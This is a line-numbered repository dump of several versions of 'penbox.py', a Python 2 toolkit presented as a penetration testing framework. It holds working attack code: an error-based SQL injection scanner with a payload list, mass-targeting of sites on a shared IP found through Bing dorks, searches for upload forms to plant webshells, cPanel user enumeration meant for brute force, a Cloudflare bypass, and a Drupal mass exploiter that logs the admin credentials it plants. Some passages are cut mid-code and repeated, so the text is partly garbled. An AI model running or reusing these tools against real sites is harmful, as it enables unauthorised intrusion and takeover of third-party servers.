trys to bypass cloudflare i already wrote 686 | in my blog how it works, i learned this 687 | method from a guy in madleets 688 | """ 689 | clearScr() 690 | print "[~] Bypassing cloudflare" 691 | subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel'] 692 | for site in self.sites : 693 | site.replace('http://', '') 694 | site.replace('/', '') 695 | try: 696 | ip = socket.gethostbyname(site) 697 | except socket.error: 698 | pass 699 | for sub in subdoms: 700 | doo = sub + '.' + site 701 | print ' [~] Trying -> ', doo 702 | try: 703 | ddd = socket.gethostbyname(doo) 704 | if ddd != ip: 705 | print ' [*] Cloudflare bypassed -> ', ddd 706 | break 707 | except socket.error : 708 | pass 709 | ############################ 710 | #find the server banner 711 | def getServerBanner(self) : 712 | """ 713 | simply gets the server banner 714 | the attacker may benefit from it 715 | like getting the server side software 716 | """ 717 | clearScr() 718 | try: 719 | s = 'http://' + self.serverip 720 | httpresponse = urllib.urlopen(s) 721 | print ' [*] Server header -> ', httpresponse.headers.getheader('server') 722 | except: 723 | pass 724 | ############################ 725 | #greb the sqli 726 | def grabSqli(self) : 727 | """ 728 | just grabs all websites in server with php?id= dork 729 | for scanning for error based sql injection 730 | """ 731 | page = 1 732 | lista = [] 733 | while page <= 101: 734 | try: 735 | bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+php?id=&count=50&first=" + str(page) 736 | openbing = urllib2.urlopen(bing) 737 | readbing = openbing.read() 738 | findwebs = re.findall('

<", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"] 760 | check = re.compile("Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I) 761 | for url in s: 762 | try: 763 | for param in url.split('?')[1].split('&'): 764 | for payload in payloads: 765 | power = url.replace(param, param + payload.strip()) 766 | #print power 767 | html = urllib2.urlopen(power).readlines() 768 | for line in html: 769 | checker = re.findall(check, line) 770 | if len(checker) != 0 : 771 | print ' [*] SQLi found -> ', power 772 | except: 773 | pass 774 | ############################ 775 | #craw SQL 776 | def crawlSqli(self, nbpages) : 777 | """ 778 | simple crawling using chilkat (yeah chilkat sucks) 779 | and scan for error based sql injection 780 | [!] will be on the next version 781 | """ 782 | import chilkat 783 | spider = chilkat.CkSpider() 784 | for url in self.sites : 785 | spidred = [] 786 | print " [~] Crawling -> ", url 787 | spider.Initialize(url) 788 | #spider.unspideredUrl(url) 789 | i = 0 790 | for i in range(nbpages) : 791 | if spider.CrawlNext() : 792 | spidred.append(spider.lastUrl()) 793 | print " [+] Crawled -> ", spidred 794 | print " [~] Scanning -> ", url, " from SQL injection" 795 | self.checkSqli(spidred) 796 | ############################ 797 | #scan for ports 798 | def portScanner(self, mode, ran) : 799 | """ 800 | simple port scanner works with range of ports 801 | or with common ports (al-swisre idea) 802 | """ 803 | clearScr() 804 | print "[~] Scanning Ports" 805 | def do_it(ip, port): 806 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 807 | #sock.settimeout(5) 808 | sock = sock.connect_ex((ip,port)) 809 | if sock == 0: 810 | print " [*] Port %i is open" % port 811 | 812 | if mode == 1 : 813 | a = ran.split('-') 814 | start = int(a[0]) 815 | end = int(a[1]) 816 | for i in range(start, end): 817 | do_it(self.serverip, i) 818 | elif mode == 2 : 819 | for port in [80,21,22,2082,25,53,110,443,143] : 820 | # didn't use multithreading cos it's few ports 821 | do_it(self.serverip, port) 822 | ############################ 823 | 824 | 825 | minu =''' 826 | \t 1: Drupal Bing Exploiter 827 | \t 2: Get Drupal Websites 828 | \t 3: Drupal Mass Exploiter 829 | \t 99: Back To Main Menu 830 | ''' 831 | 832 | 833 | #Definition Of Drupal Bing Expoliter 834 | def drupal(): 835 | 836 | '''Drupal Exploit Binger All Websites Of server ''' 837 | ip = raw_input('1- IP : ') 838 | page = 1 839 | while page <= 50 : 840 | 841 | url = "http://www.bing.com/search?q=ip%3A"+ip+"&go=Valider&qs=n&form=QBRE&pq=ip%3A"+ip+"&sc=0-0&sp=-1&sk=&cvid=af529d7028ad43a69edc90dbecdeac4f&first="+str(page) 842 | req = urllib2.Request(url) 843 | opreq = urllib2.urlopen(req).read() 844 | findurl = re.findall('

"+site 858 | 859 | print "user:HolaKo\npass:admin" 860 | a = open('up.txt','a') 861 | a.write(site+'\n') 862 | a.write("user:"+user+"\npass:"+pwd+"\n") 863 | else : 864 | print "[-] Expl Not Found :( " 865 | 866 | except Exception as ex : 867 | print ex 868 | sys.exit(0) 869 | 870 | 871 | #Drupal Server ExtraCtor 872 | def getdrupal(): 873 | ip = raw_input('2- Ip : ') 874 | page = 1 875 | sites = list() 876 | while page <= 50 : 877 | 878 | url = "http://www.bing.com/search?q=ip%3A"+ip+"+node&go=Valider&qs=ds&form=QBRE&first="+str(page) 879 | req = urllib2.Request(url) 880 | opreq = urllib2.urlopen(req).read() 881 | findurl = re.findall('

"+url 904 | print "[-]username:HolaKo\n[-]password:admin" 905 | save = open('drupal.txt','a') 906 | save.write(url+"\n"+"[-]username:HolaKo\n[-]password:admin\n") 907 | 908 | else : 909 | print i + "=> exploit not found " 910 | except Exception as ex : 911 | print ex 912 | 913 | def maine(): 914 | 915 | print minu 916 | choose = raw_input("choose a number :") 917 | while True : 918 | 919 | if choose == "1": 920 | drupal() 921 | if choose == "2": 922 | getdrupal() 923 | if choose == "3": 924 | drupallist() 925 | if choose == "4": 926 | about() 927 | if choose == "99": 928 | 929 | menu() 930 | con = raw_input('Continue [Y/n] -> ') 931 | if con[0].upper() == 'N' : 932 | exit() 933 | if con[0].upper() == 'Y' : 934 | maine() 935 | 936 | 937 | #initialise the tnscan function 938 | class tnn(): 939 | def __init__(self): 940 | clearScr() 941 | aaa = raw_input("Target IP : ") 942 | TNscan(aaa) 943 | ############################ 944 | #begin :D 945 | if __name__ == "__main__": 946 | OS() 947 | 948 | 949 | 950 | 951 | 952 | -------------------------------------------------------------------------------- /Versions/V1.2/penbox.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2.7 2 | # 3 | # All In One Tool For Penetration Testing 4 | # Authors : Fedy Wesleti , Mohamed Nour 5 | # 6 | import sys 7 | import os 8 | import time 9 | import httplib 10 | import subprocess 11 | import re, urllib2 12 | import socket 13 | import urllib,sys,json 14 | import telnetlib 15 | import glob 16 | import random 17 | import Queue 18 | import threading 19 | from getpass import getpass 20 | from commands import * 21 | from sys import argv 22 | from platform import system 23 | from urlparse import urlparse 24 | from xml.dom import minidom 25 | from optparse import OptionParser 26 | from time import sleep 27 | ########################## 28 | #Variables 29 | yes = set(['yes','y', 'ye', 'Y']) 30 | no = set(['no','n']) 31 | def logo(): 32 | print """ 33 | ######## ######## ## ## ######## ####### ## ## 34 | ## ## ## ### ## ## ## ## ## ## ## 35 | ## ## ## #### ## ## ## ## ## ## ## 36 | ######## ###### ## ## ## ######## ## ## ### 37 | ## ## ## #### ## ## ## ## ## ## 38 | ## ## ## ### ## ## ## ## ## ## 39 | ## ######## ## ## ######## ####### ## ## v1.2 40 | A Penetration Testing Framework 41 | 42 | [+] Coded BY Fedy Wesleti & Mohamed Nour [+] 43 | [+] FB/CEH.TN ~~ FB/mohamed.zeus.0 [+] 44 | [+] Greetz To All Pentesters [+] 45 | """ 46 | def menu(): 47 | print (""" 48 | ######## ######## ## ## ######## ####### ## ## 49 | ## ## ## ### ## ## ## ## ## ## ## 50 | ## ## ## #### ## ## ## ## ## ## ## 51 | ######## ###### ## ## ## ######## ## ## ### 52 | ## ## ## #### ## ## ## ## ## ## 53 | ## ## ## ### ## ## ## ## ## ## 54 | ## ######## ## ## ######## ####### ## ## v1.2 55 | A Penetration Testing Framework 56 | 57 | [+] Coded BY Fedy Wesleti & Mohamed Nour [+] 58 | [+] FB/CEH.TN ~~ FB/mohamed.zeus.0 [+] 59 | [+] Greetz To All Pentesters [+] 60 | 61 | Select from the menu: 62 | 63 | 1 : Information Gathering 64 | 2 : Password Attacks 65 | 3 : Wireless Testing 66 | 4 : Exploitation Tools 67 | 5 : Sniffing & Spoofing 68 | 6 : Web Hacking 69 | 7 : Privat Tools 70 | 99 : Exit 71 | 72 | """) 73 | choice = raw_input("Enter Your Choice:") 74 | 75 | if choice == "1": 76 | info() 77 | elif choice == "2": 78 | passwd() 79 | elif choice == "3": 80 | wire() 81 | elif choice == "4": 82 | exp() 83 | elif choice == "5": 84 | snif() 85 | elif choice == "6": 86 | webhack() 87 | elif choice == "7": 88 | tnn() 89 | elif choice == "99": 90 | clearScr(),sys.exit(); 91 | elif choice == "": 92 | menu() 93 | else: 94 | menu() 95 | def h2ip(): 96 | host = raw_input("Select A Host : ") 97 | ips = socket.gethostbyname(host) 98 | print(ips) 99 | def ports(): 100 | clearScr() 101 | target = raw_input('Select a Target IP :') 102 | os.system("nmap -O -Pn %s" % target) 103 | sys.exit(); 104 | def ifinurl(): 105 | print""" This Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found.""" 106 | print('do you have Inurlbr installed ? ') 107 | cinurl = raw_input("Y / N : ") 108 | if cinurl in yes: 109 | inurl() 110 | if cinurl in no: 111 | insinurl() 112 | elif cinurl == "": 113 | menu() 114 | else: 115 | menu() 116 | def commix(): 117 | print ("Automated All-in-One OS Command Injection and Exploitation Tool.") 118 | print ("usage : python commix.py --help") 119 | choicecmx = raw_input("Continue: y/n :") 120 | if choicecmx in yes: 121 | os.system("git clone https://github.com/stasinopoulos/commix.git commix") 122 | elif choicecmx in no: 123 | os.system('clear'); info() 124 | 125 | def pixiewps(): 126 | print"""Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some Access Points, the so-called "pixie dust attack" discovered by Dominique Bongard in summer 2014. It is meant for educational purposes only 127 | """ 128 | choicewps = raw_input("Continue ? Y/N : ") 129 | if choicewps in yes : 130 | os.system("git clone https://github.com/wiire/pixiewps.git") 131 | os.system(" cd pixiewps/src & make ") 132 | os.system(" cd pixiewps/src & sudo make install") 133 | if choicewps in no : 134 | menu() 135 | elif choicewps == "": 136 | menu() 137 | else: 138 | menu() 139 | def webhack(): 140 | print("1 : Drupal Hacking ") 141 | print("2 : Inurlbr") 142 | print("3 : Wordpress & Joomla Scanner") 143 | print("4 : Gravity Form Scanner") 144 | print("5 : File Upload Checker") 145 | print("6 : Wordpress Exploit Scanner") 146 | print("99 : Exit") 147 | choiceweb = raw_input("Enter Your Choice : ") 148 | if choiceweb == "1": 149 | clearScr() 150 | maine() 151 | if choiceweb == "2": 152 | clearScr(); ifinurl() 153 | if choiceweb =='3': 154 | clearScr(); wppjmla() 155 | if choiceweb =="4": 156 | clearScr(); gravity() 157 | if choiceweb =="5": 158 | clearScr(); sqlscan() 159 | if choiceweb =="6": 160 | clearScr(); wpminiscanner() 161 | elif choiceweb =="99": 162 | menu() 163 | elif choiceweb == "": 164 | menu() 165 | else: 166 | menu() 167 | def inurl(): 168 | dork = raw_input("select a Dork:") 169 | output = raw_input("select a file to save :") 170 | os.system("./inurlbr.php --dork '{0}' -s {1}.txt -q 1,6 -t 1".format(dork, output)) 171 | if cinurl in no: 172 | insinurl() 173 | elif cinurl == "": 174 | menu() 175 | else: 176 | menu() 177 | def insinurl(): 178 | os.system("git clone https://github.com/googleinurl/SCANNER-INURLBR.git") 179 | os.system("chmod +x SCANNER-INURLBR/inurlbr.php") 180 | os.system("apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl") 181 | os.system("mv /SCANNER-INURLBR/inurbr.php inurlbr.php") 182 | clearScr() 183 | inurl() 184 | def nmap(): 185 | 186 | choice7 = raw_input("continue ? Y / N : ") 187 | if choice7 in yes : 188 | os.system("wget https://nmap.org/dist/nmap-7.01.tar.bz2") 189 | os.system("bzip2 -cd nmap-7.01.tar.bz2 | tar xvf -") 190 | os.system("cd nmap-7.01 & ./configure") 191 | os.system("cd nmap-7.01 & make") 192 | os.system("su root") 193 | os.system("cd nmap-7.01 & make install") 194 | elif choice7 in no : 195 | info() 196 | elif choice7 == "": 197 | menu() 198 | else: 199 | menu() 200 | def jboss(): 201 | os.system('clear') 202 | print ("This JBoss script deploys a JSP shell on the target JBoss AS server. Once") 203 | print ("deployed, the script uses its upload and command execution capability to") 204 | print ("provide an interactive session.") 205 | print ("") 206 | print ("usage : ./e.sh target_ip tcp_port ") 207 | print("Continue: y/n") 208 | choice9 = raw_input("yes / no :") 209 | if choice9 in yes: 210 | os.system("git clone https://github.com/SpiderLabs/jboss-autopwn.git"),sys.exit(); 211 | elif choice9 in no: 212 | os.system('clear'); exp() 213 | elif choice9 == "": 214 | menu() 215 | else: 216 | menu() 217 | def sqlmap(): 218 | print ("usage : python sqlmap.py -h") 219 | choice8 = raw_input("Continue: y/n :") 220 | if choice8 in yes: 221 | os.system("git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev & ") 222 | elif choice8 in no: 223 | os.system('clear'); info() 224 | elif choice8 == "": 225 | menu() 226 | else: 227 | menu() 228 | def setoolkit(): 229 | print ("The Social-Engineer Toolkit is an open-source penetration testing framework") 230 | print(") designed for social engineering. SET has a number of custom attack vectors that ") 231 | print(" allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC ") 232 | print("an information security consulting firm located in Cleveland, Ohio.") 233 | print("") 234 | choiceset = raw_input("y / n :") 235 | if choiceset in yes: 236 | os.system("git clone https://github.com/trustedsec/social-engineer-toolkit.git") 237 | os.system("python social-engineer-toolkit/setup.py") 238 | if choiceset in no: 239 | clearScr(); info() 240 | elif choiceset == "": 241 | menu() 242 | else: 243 | menu() 244 | def cupp(): 245 | print("cupp is a password list generator ") 246 | print("Usage: python cupp.py -h") 247 | choicecupp = raw_input("Continue: y/n : ") 248 | 249 | if choicecupp in yes: 250 | os.system("git clone https://github.com/Mebus/cupp.git") 251 | print("file downloaded successfully") 252 | elif choicecupp in no: 253 | clearScr(); passwd() 254 | elif choicecupp == "": 255 | menu() 256 | else: 257 | menu() 258 | def ncrack(): 259 | print("A Ruby interface to Ncrack, Network authentication cracking tool.") 260 | print("requires : nmap >= 0.3ALPHA / rprogram ~> 0.3") 261 | print("Continue: y/n") 262 | choicencrack = raw_input("y / n :") 263 | if choicencrack in yes: 264 | os.system("git clone https://github.com/sophsec/ruby-ncrack.git") 265 | os.system("cd ruby-ncrack") 266 | os.system("install ruby-ncrack") 267 | elif choicencrack in no: 268 | clearScr(); passwd() 269 | elif choicencrack == "": 270 | menu() 271 | else: 272 | menu() 273 | def reaver(): 274 | print """ 275 | Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup 276 | WPS registrar PINs in order to recover WPA/WPA2 passphrases. It has been tested against a 277 | wide variety of access points and WPS implementations 278 | 1 to accept / 0 to decline 279 | """ 280 | creaver = raw_input("y / n :") 281 | if creaver in yes: 282 | os.system("apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps") 283 | os.system("git clone https://github.com/t6x/reaver-wps-fork-t6x.git") 284 | os.system("cd reaver-wps-fork-t6x/src/ & ./configure") 285 | os.system("cd reaver-wps-fork-t6x/src/ & make") 286 | elif creaver in no: 287 | clearScr(); wire() 288 | elif creaver == "": 289 | menu() 290 | else: 291 | menu() 292 | def ssls(): 293 | print"""sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping 294 | attacks. 295 | It requires Python 2.5 or newer, along with the 'twisted' python module.""" 296 | cssl = raw_input("y / n :") 297 | if cssl in yes: 298 | os.system("git clone https://github.com/moxie0/sslstrip.git") 299 | os.system("sudo apt-get install python-twisted-web") 300 | os.system("python sslstrip/setup.py") 301 | if cssl in no: 302 | snif() 303 | elif cssl =="": 304 | menu() 305 | else: 306 | menu() 307 | def unique(seq): 308 | seen = set() 309 | return [seen.add(x) or x for x in seq if x not in seen] 310 | def bing_all_grabber(s): 311 | 312 | lista = [] 313 | page = 1 314 | while page <= 101: 315 | try: 316 | bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page) 317 | openbing = urllib2.urlopen(bing) 318 | readbing = openbing.read() 319 | findwebs = re.findall('

') 525 | if choice == '1' : 526 | self.getSites(True) 527 | elif choice == '2' : 528 | self.getJoomla() 529 | elif choice == '3' : 530 | self.getWordpress() 531 | elif choice == '4' : 532 | self.findPanels() 533 | elif choice == '5' : 534 | self.findZip() 535 | elif choice == '6' : 536 | self.findUp() 537 | elif choice == '7' : 538 | self.getUsers() 539 | elif choice == '8' : 540 | self.grabSqli() 541 | elif choice == '9' : 542 | ran = raw_input(' Enter range of ports, (ex : 1-1000) -> ') 543 | self.portScanner(1, ran) 544 | elif choice == '10' : 545 | self.portScanner(2, None) 546 | elif choice == '11' : 547 | self.getServerBanner() 548 | elif choice == '12' : 549 | self.cloudflareBypasser() 550 | elif choice == '99' : 551 | menu() 552 | con = raw_input(' Continue [Y/n] -> ') 553 | if con[0].upper() == 'N' : 554 | exit() 555 | else : 556 | clearScr() 557 | print menuu 558 | def getSites(self, a) : 559 | """ 560 | get all websites on same server 561 | from bing search 562 | """ 563 | lista = [] 564 | page = 1 565 | while page <= 101: 566 | try: 567 | bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+&count=50&first=" + str(page) 568 | openbing = urllib2.urlopen(bing) 569 | readbing = openbing.read() 570 | findwebs = re.findall('

", site + admin 656 | except IOError : 657 | pass 658 | ############################ 659 | #find ZIP files 660 | def findZip(self) : 661 | """ 662 | find zip files from grabbed websites 663 | it may contain useful informations 664 | """ 665 | zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar', 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar'] 666 | clearScr() 667 | print "[~] Finding zip file" 668 | for site in self.sites : 669 | for zip1 in zipList : 670 | try: 671 | if urllib.urlopen(site + zip1).getcode() == 200 : 672 | print " [*] Found zip file -> ", site + zip1 673 | except IOError : 674 | pass 675 | ############################ 676 | #find upload directories 677 | def findUp(self) : 678 | """ 679 | find upload forms from grabbed 680 | websites the attacker may succeed to 681 | upload malicious files like webshells 682 | """ 683 | upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php','blog/up.php', 'upload.php', 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php'] 684 | clearScr() 685 | print "[~] Finding Upload" 686 | for site in self.sites : 687 | for up in upList : 688 | try : 689 | if (urllib.urlopen(site + up).getcode() == 200) : 690 | html = urllib.urlopen(site + up).readlines() 691 | for line in html : 692 | if re.findall('type=file', line) : 693 | print " [*] Found upload -> ", site+up 694 | except IOError : 695 | pass 696 | ############################ 697 | #find users 698 | def getUsers(self) : 699 | """ 700 | get server users using a method found by 701 | iranian hackers , the attacker may 702 | do a bruteforce attack on CPanel, ssh, ftp or 703 | even mysql if it supports remote login 704 | (you can use medusa or hydra) 705 | """ 706 | clearScr() 707 | print "[~] Grabbing Users" 708 | userslist = [] 709 | for site1 in self.sites : 710 | try: 711 | site = site1 712 | site = site.replace('http://www.', '') 713 | site = site.replace('http://', '') 714 | site = site.replace('.', '') 715 | if '-' in site: 716 | site = site.replace('-', '') 717 | site = site.replace('/', '') 718 | while len(site) > 2: 719 | resp = urllib2.urlopen(site1 + '/cgi-sys/guestbook.cgi?user=%s' % site).read() 720 | if 'invalid username' not in resp.lower(): 721 | print '\t [*] Found -> ', site 722 | userslist.append(site) 723 | break 724 | else : 725 | print site 726 | 727 | site = site[:-1] 728 | except: 729 | pass 730 | 731 | clearScr() 732 | for user in userslist : 733 | print user 734 | ############################ 735 | #bypass cloudflare 736 | def cloudflareBypasser(self) : 737 | """ 738 | trys to bypass cloudflare i already wrote 739 | in my blog how it works, i learned this 740 | method from a guy in madleets 741 | """ 742 | clearScr() 743 | print "[~] Bypassing cloudflare" 744 | subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel'] 745 | for site in self.sites : 746 | site.replace('http://', '') 747 | site.replace('/', '') 748 | try: 749 | ip = socket.gethostbyname(site) 750 | except socket.error: 751 | pass 752 | for sub in subdoms: 753 | doo = sub + '.' + site 754 | print ' [~] Trying -> ', doo 755 | try: 756 | ddd = socket.gethostbyname(doo) 757 | if ddd != ip: 758 | print ' [*] Cloudflare bypassed -> ', ddd 759 | break 760 | except socket.error : 761 | pass 762 | ############################ 763 | #find the server banner 764 | def getServerBanner(self) : 765 | """ 766 | simply gets the server banner 767 | the attacker may benefit from it 768 | like getting the server side software 769 | """ 770 | clearScr() 771 | try: 772 | s = 'http://' + self.serverip 773 | httpresponse = urllib.urlopen(s) 774 | print ' [*] Server header -> ', httpresponse.headers.getheader('server') 775 | except: 776 | pass 777 | ############################ 778 | #greb the sqli 779 | def grabSqli(self) : 780 | """ 781 | just grabs all websites in server with php?id= dork 782 | for scanning for error based sql injection 783 | """ 784 | page = 1 785 | lista = [] 786 | while page <= 101: 787 | try: 788 | bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+php?id=&count=50&first=" + str(page) 789 | openbing = urllib2.urlopen(bing) 790 | readbing = openbing.read() 791 | findwebs = re.findall('

<", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"] 813 | check = re.compile("Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I) 814 | for url in s: 815 | try: 816 | for param in url.split('?')[1].split('&'): 817 | for payload in payloads: 818 | power = url.replace(param, param + payload.strip()) 819 | #print power 820 | html = urllib2.urlopen(power).readlines() 821 | for line in html: 822 | checker = re.findall(check, line) 823 | if len(checker) != 0 : 824 | print ' [*] SQLi found -> ', power 825 | except: 826 | pass 827 | ############################ 828 | ############################ 829 | #scan for ports 830 | def portScanner(self, mode, ran) : 831 | """ 832 | simple port scanner works with range of ports 833 | or with common ports (al-swisre idea) 834 | """ 835 | clearScr() 836 | print "[~] Scanning Ports" 837 | def do_it(ip, port): 838 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 839 | #sock.settimeout(5) 840 | sock = sock.connect_ex((ip,port)) 841 | if sock == 0: 842 | print " [*] Port %i is open" % port 843 | 844 | if mode == 1 : 845 | a = ran.split('-') 846 | start = int(a[0]) 847 | end = int(a[1]) 848 | for i in range(start, end): 849 | do_it(self.serverip, i) 850 | elif mode == 2 : 851 | for port in [80,21,22,2082,25,53,110,443,143] : 852 | # didn't use multithreading cos it's few ports 853 | do_it(self.serverip, port) 854 | ############################ 855 | minu =''' 856 | \t 1: Drupal Bing Exploiter 857 | \t 2: Get Drupal Websites 858 | \t 3: Drupal Mass Exploiter 859 | \t 99: Back To Main Menu 860 | ''' 861 | 862 | 863 | #Definition Of Drupal Bing Expoliter 864 | def drupal(): 865 | 866 | '''Drupal Exploit Binger All Websites Of server ''' 867 | ip = raw_input('1- IP : ') 868 | page = 1 869 | while page <= 50 : 870 | 871 | url = "http://www.bing.com/search?q=ip%3A"+ip+"&go=Valider&qs=n&form=QBRE&pq=ip%3A"+ip+"&sc=0-0&sp=-1&sk=&cvid=af529d7028ad43a69edc90dbecdeac4f&first="+str(page) 872 | req = urllib2.Request(url) 873 | opreq = urllib2.urlopen(req).read() 874 | findurl = re.findall('

"+site 888 | 889 | print "user:HolaKo\npass:admin" 890 | a = open('up.txt','a') 891 | a.write(site+'\n') 892 | a.write("user:"+user+"\npass:"+pwd+"\n") 893 | else : 894 | print "[-] Expl Not Found :( " 895 | 896 | except Exception as ex : 897 | print ex 898 | sys.exit(0) 899 | 900 | 901 | #Drupal Server ExtraCtor 902 | def getdrupal(): 903 | ip = raw_input('Enter The Ip : ') 904 | page = 1 905 | sites = list() 906 | while page <= 50 : 907 | 908 | url = "http://www.bing.com/search?q=ip%3A"+ip+"+node&go=Valider&qs=ds&form=QBRE&first="+str(page) 909 | req = urllib2.Request(url) 910 | opreq = urllib2.urlopen(req).read() 911 | findurl = re.findall('

"+url 934 | print "[-]username:HolaKo\n[-]password:admin" 935 | save = open('drupal.txt','a') 936 | save.write(url+"\n"+"[-]username:HolaKo\n[-]password:admin\n") 937 | 938 | else : 939 | print i + "=> exploit not found " 940 | except Exception as ex : 941 | print ex 942 | def maine(): 943 | 944 | print minu 945 | choose = raw_input("choose a number :") 946 | while True : 947 | 948 | if choose == "1": 949 | drupal() 950 | if choose == "2": 951 | getdrupal() 952 | if choose == "3": 953 | drupallist() 954 | if choose == "4": 955 | about() 956 | if choose == "99": 957 | 958 | menu() 959 | con = raw_input('Continue [Y/n] -> ') 960 | if con[0].upper() == 'N' : 961 | exit() 962 | if con[0].upper() == 'Y' : 963 | maine() 964 | def unique(seq): 965 | seen = set() 966 | return [seen.add(x) or x for x in seq if x not in seen] 967 | def bing_all_grabber(s): 968 | lista = [] 969 | page = 1 970 | while page <= 101: 971 | try: 972 | bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page) 973 | openbing = urllib2.urlopen(bing) 974 | readbing = openbing.read() 975 | findwebs = re.findall('

" + sqli) 1081 | def sqlscan(): 1082 | ip = raw_input('Enter IP : ') 1083 | grabsqli(ip) 1084 | # found this code on stackoverflow.com/questions/19278877 1085 | def unique(seq): 1086 | seen = set() 1087 | return [seen.add(x) or x for x in seq if x not in seen] 1088 | def bing_all_grabber(s): 1089 | lista = [] 1090 | page = 1 1091 | while page <= 101: 1092 | try: 1093 | bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page) 1094 | openbing = urllib2.urlopen(bing) 1095 | readbing = openbing.read() 1096 | findwebs = re.findall('

= 0.3ALPHA / rprogram ~> 0.3") 331 | print("Continue: y/n") 332 | choicencrack = raw_input("y / n :") 333 | if choicencrack in yes: 334 | os.system("git clone https://github.com/sophsec/ruby-ncrack.git") 335 | os.system("cd ruby-ncrack") 336 | os.system("install ruby-ncrack") 337 | elif choicencrack in no: 338 | clearScr(); passwd() 339 | elif choicencrack == "": 340 | menu() 341 | else: 342 | menu() 343 | def reaver(): 344 | print """ 345 | Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup 346 | WPS registrar PINs in order to recover WPA/WPA2 passphrases. It has been tested against a 347 | wide variety of access points and WPS implementations 348 | 1 to accept / 0 to decline 349 | """ 350 | creaver = raw_input("y / n :") 351 | if creaver in yes: 352 | os.system("apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps") 353 | os.system("git clone https://github.com/t6x/reaver-wps-fork-t6x.git") 354 | os.system("cd reaver-wps-fork-t6x/src/ & ./configure") 355 | os.system("cd reaver-wps-fork-t6x/src/ & make") 356 | elif creaver in no: 357 | clearScr(); wire() 358 | elif creaver == "": 359 | menu() 360 | else: 361 | menu() 362 | def ssls(): 363 | print"""sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping 364 | attacks. 365 | It requires Python 2.5 or newer, along with the 'twisted' python module.""" 366 | cssl = raw_input("y / n :") 367 | if cssl in yes: 368 | os.system("git clone https://github.com/moxie0/sslstrip.git") 369 | os.system("sudo apt-get install python-twisted-web") 370 | os.system("python sslstrip/setup.py") 371 | if cssl in no: 372 | snif() 373 | elif cssl =="": 374 | menu() 375 | else: 376 | menu() 377 | def unique(seq): 378 | seen = set() 379 | return [seen.add(x) or x for x in seq if x not in seen] 380 | def bing_all_grabber(s): 381 | 382 | lista = [] 383 | page = 1 384 | while page <= 101: 385 | try: 386 | bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page) 387 | openbing = urllib2.urlopen(bing) 388 | readbing = openbing.read() 389 | findwebs = re.findall('

') 597 | if choice == '1' : 598 | self.getSites(True) 599 | elif choice == '2' : 600 | self.getJoomla() 601 | elif choice == '3' : 602 | self.getWordpress() 603 | elif choice == '4' : 604 | self.findPanels() 605 | elif choice == '5' : 606 | self.findZip() 607 | elif choice == '6' : 608 | self.findUp() 609 | elif choice == '7' : 610 | self.getUsers() 611 | elif choice == '8' : 612 | self.grabSqli() 613 | elif choice == '9' : 614 | ran = raw_input(' Enter range of ports, (ex : 1-1000) -> ') 615 | self.portScanner(1, ran) 616 | elif choice == '10' : 617 | self.portScanner(2, None) 618 | elif choice == '11' : 619 | self.getServerBanner() 620 | elif choice == '12' : 621 | self.cloudflareBypasser() 622 | elif choice == '99' : 623 | menu() 624 | con = raw_input(' Continue [Y/n] -> ') 625 | if con[0].upper() == 'N' : 626 | exit() 627 | else : 628 | clearScr() 629 | print menuu 630 | def getSites(self, a) : 631 | """ 632 | get all websites on same server 633 | from bing search 634 | """ 635 | lista = [] 636 | page = 1 637 | while page <= 101: 638 | try: 639 | bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+&count=50&first=" + str(page) 640 | openbing = urllib2.urlopen(bing) 641 | readbing = openbing.read() 642 | findwebs = re.findall('

